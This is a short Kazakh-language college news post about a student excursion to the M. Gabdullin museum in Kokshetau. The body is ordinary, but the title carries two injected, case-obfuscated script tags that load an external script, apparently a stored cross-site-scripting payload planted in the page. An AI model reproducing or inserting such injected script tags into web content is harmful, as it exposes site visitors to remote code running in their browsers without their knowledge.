МҰРАЖАЙ – ҒАСЫРЛАР ШЕЖІРЕСІ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.10.2022

Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжі «Бастауыш мектеп» бөлімінің БМ-22ҚБ тобының студенттері жетекшісі Отарбаева Мәншүк Серікқызының ұйымдастыруымен қалалық М.Ғабдуллин атындағы мұражайға экскурсия жасады. Іс-шара барысында білім алушылар музейдің 4 бөлімнен тұратын залдарын аралап, тарихи жәдігерлермен танысып, білім көкжиектерін кеңейтті. «Өткенді білмей, болашақты болжау мүмкін емес» деген қанатты сөзді ұстана отырып, студенттер экскурсия барысында музейден таным-түсініктерін молайтып, тарихи сана қалыптасуына жол ашты. Кеңес Одағының батыры, академик, жазушы М.Ғабдуллиннің өмірі мен шығармашылығы және өлкеміздің өткен тарихына деген  қызығушылықтары артып, мұндай игі істердің жалғасын табуын қалайтындықтарын жеткізді.

Просмотров: 418


Пікір қосу



Деректерді қолтаңбаға қосу